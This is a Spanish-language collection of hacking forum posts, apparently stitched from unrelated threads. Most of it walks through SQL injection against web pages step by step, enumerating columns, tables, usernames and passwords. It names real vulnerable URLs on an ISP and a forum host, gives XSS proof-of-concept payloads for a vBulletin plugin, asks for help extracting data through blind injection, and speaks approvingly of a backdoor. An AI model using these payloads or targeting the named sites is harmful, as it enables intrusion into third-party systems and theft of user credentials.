me quede en el nivel 10 :S alguien lo paso?

he probado en la 1,2,3,4,5 pero nada y es màs cuando hago esto:

-1+union+all+select+1,2,concat(usuario,pass,@@version,user()),4,5+from+usuarios/*

en cualquiera y me larga el user y la version.

hasta probe algo asi:

-1+union+all+select+1,2,concat(usuario,pass,@@version,user()),4,5+from+usuarios+LIMIT 1,1/*

tendria que si ese lugar esta vacio me larga el que viene.

pero sigo sin resultados bueno gracias por la ayuda igual.

yo creo que esto es grave y màs cuando hay un sistema para usuarios, webmail y etc .. siendo un proveedor.aparte de este sql injection tambien se puede explotar xss.saludos!

navegando por ahi me di con este sql injection:

:http://salidas.arnet.com.ar/cine/ficha_cine.php?idFicha=-1+order+by+4/*

error no reportado.

 

visto en: http://mentespiritual.com/isp.txt

Bueno he hecho lo siguiente ..

supongamos que tenemos esto.

http://www.site.com/id.php?numero=

bueno enpese haciendo esto ..

http://www.site.com/id.php?numero=-1 order by 1

pero apenas lo hice problemas y tiro el siguiente error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY cuando.IDCUANDO DESC LIMIT 0, 10' at line 1

pero eso se arreglo de la siguiente forma ..

http://www.site.com/id.php?numero=-1 order by 1/*

asi que comente la linea y procedi.


http://www.site.com/id.php?numero=-1 order by 1/*
http://www.site.com/id.php?numero=-1 order by 2/*
http://www.site.com/id.php?numero=-1 order by 3/*
http://www.site.com/id.php?numero=-1 order by 4/*
http://www.site.com/id.php?numero=-1 order by 5/*
hasta que:
http://www.site.com/id.php?numero=-1 order by 6/*
Unknown column '6' in 'order clause'

luego:

http://www.site.com/id.php?numero=-1 union all select 1,2,3,4,5/*

tiro un 2 asi que hice esto.

http://www.site.com/id.php?numero=-1 union all select 1,table_name,3,4,5 from information_schema.tables where table_schema = database()/*

pero obtuve:

SELECT command denied to user 'alguien'@'localhost' for table 'tables'

entonces como no podia y tenia suficientes datos me puse a averiguar las tablas:

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from users/*

pero me tiro:

Table 'db.users' doesn't exist

asi que probe con otro y puse "usuarios"

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from usuarios/*

y vaya le pegue! tiro:

Unknown column 'username' in 'field list'

asi que puse otros nombres para reemplazar a "username" hasta que al poner "usuario":

http://www.site.com/id.php?numero=-1 union all select 1,concat(usuario),3,4,5 from usuarios/*

sii! le habia pegado.

pero ...

me tiro la pagina pero no los datos que contenia .. :S.

no habia nada màs que unos : y probe:

http://www.site.com/id.php?numero=-1 union all select 1,concat(pass),3,4,5 from usuarios/*

y tambien le pegue! pero  estaban los 2 puntos .. se que no eran nada pero por las dudas los use para iniciar sesiòn y no tuve resultados.

tambien mire el codigo fuente quizas estaba abajo del flash pero no encontre nada.

por que la pagina no me tira los datos contenidos?



si alguien me puede ayudar estoy aprendiendo 

/* esto fue injection html http://foros.tux.cl/ */ jaja

no se que decir por ellos .. sorprende.

bueno parece que te tiro un error 404 no debe existir o tener el ajaxReg puede ser eso.no todos lo tienen.y por lo de foroswebgratis lo hice con la intenciòn de mostrar como se podria explotar la vulnerabilidad en realidad no se si funciona en foroswebgratis nunca lo probe.

saludos!

si queres buscar xss aca un buen paper http://milw0rm.com/papers/192

mi amigo me ha mostrado estas fotos de una supuesta sirena .. la verdad que en mi opinion no es real. ustedes que opinan?
sirena aca: http://biboz.net/sirena/

"se requiere ajaxReg para explotar la vulnerabilidad"


El error esta en ajaxReg (http://www.vbulletin.org/forum/showthread.php?t=144869) sirve para comprobar los datos cuando se esta escribiendo ..

POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=XSS

http://www.site.com/foro/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

http://www.foro-cualquiera.com/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>




publicado en: http://mentespiritual.com/xss.txt

gracias intentare una vez màs buscar una soluciòn . tambien encontre un poco de ayuda en otro post de este foro.saludos!

bueno he encontrado un blind sql injection en una web e intentando usar blind sql en mysql y he sacado la version mysql,el usuario de mysql,el nombre de la base de datos y una sola tabla valida .. tambien saque cuantas tablas existen en la base de datos pero no consigo obtener datos .. he intentado hacer algo como esto:

injection:

-1+union+all+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema+=+database()
y obtuve:

SELECT command denied to user 'root'@'localhost' for table 'tables'

y eso me quita varias posibilidades que se .. tambien hice:

-1+UNION+ALL+SELECT+1,2,3,@@version,5,6,7+FROM+noticias/*

y saque la version pero no encuentro alguna columna valida mi pregunta es .. que programa de automatizaciòn me puede servir con los datos que obtuve para sacar otras tablas o otras base de datos y como podria obtener algunas columna de las tablas?

o que posibilidades hay de que pueda sacar datos de forma exitosa? al parecer esa web esta hecha por algun servicio de diseño web y varias paginas de ese mismo servicio son vulnerables .. todas ellas corren sobre servidores windows.

salu2!

al entrar a la web y dar click a cualkier link aparece esto.

http://img441.imageshack.us/img441/3103/klklro7.jpg

que opinan?

si funciona de maravilla el backdoor estaria bueno agregarle màs funciones .

aca los nuevos XSS.

http://www.foroswebgratis.com/home-buscador-run.php?buscar=><h1>XSS
http://www.foroswebgratis.com/new_user.php?Mail="</form><h1>XSS
imagenes:

http://img210.¡mageshack.us/img210/4825/xss1xb5.jpg
http://img210.¡mageshack.us/img210/4185/xss2wz2.jpg

http://foro.elhacker.net/index.php/topic,253.0.html

este bug ya no va.

creo que es sha-1.